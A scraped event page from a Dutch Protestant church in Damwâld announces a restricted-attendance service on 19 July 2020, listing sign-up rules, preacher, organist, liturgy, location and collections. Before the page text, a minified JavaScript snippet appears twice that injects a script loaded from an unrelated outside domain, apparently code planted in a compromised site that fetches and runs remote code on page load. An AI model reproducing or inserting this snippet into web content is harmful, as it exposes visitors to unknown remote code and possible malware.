;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Aangepaste gezamenlijke kerkdienst - PKN Damwâld
zondag 19 juli 2020
19:30 uur
Als u de dienst wilt bijwonen, moet u zich per week vooraf opgeven voor de dienst van de komende zondag. Dit kan op woensdag-, donderdag- of vrijdagavond van 19.00-20.00 uur, uitsluitend via telefoonnummer: 06-1475 1932. Alleen de mensen die zich hebben opgegeven, kunnen de dienst bijwonen. Helaas, vol is vol. Indien u na opgave toch klachten krijgt, of alsnog niet kunt komen, hoeft u zich niet af te melden.

Aangepaste gezamenlijke kerkdienst

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte Cuperus
Mededeling:Als u de dienst wilt bijwonen, moet u zich per week vooraf opgeven voor de dienst van de komende zondag. Dit kan op woensdag-, donderdag- of vrijdagavond van 19.00-20.00 uur, uitsluitend via telefoonnummer: 06-1475 1932. Alleen de mensen die zich hebben opgegeven, kunnen de dienst bijwonen. Helaas, vol is vol. Indien u na opgave toch klachten krijgt, of alsnog niet kunt komen, hoeft u zich niet af te melden.
Liturgie
Welkomstwoord
Stil gebed, Votum en groet
aanvangstekst Lev.19:1-2
We zingen: Ps. 99 : 4 en 6
Gebed
We lezen: 1 Thess. 5:4-9
We zingen: Elb 346:1
Preek 1 Petrus 1: 13-14
We zingen: Gez. 462: 1 en 2
We zingen: Jes. 6 :1-8
We zingen: Nlb 985 : 1, 2 en 3
Preek 1 Petrus 1 : 15-16
We zingen: Nlb 834 : 1, 2 en 3
Lezing van de Geloofsbelijdenis
Dankzegging en voorbeden Het Onze Vader
We zingen: Nlb 415 : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Stichting Vrienden van De Hoop
Tweede collecte: Kerk
Uitganscollecte: Kerk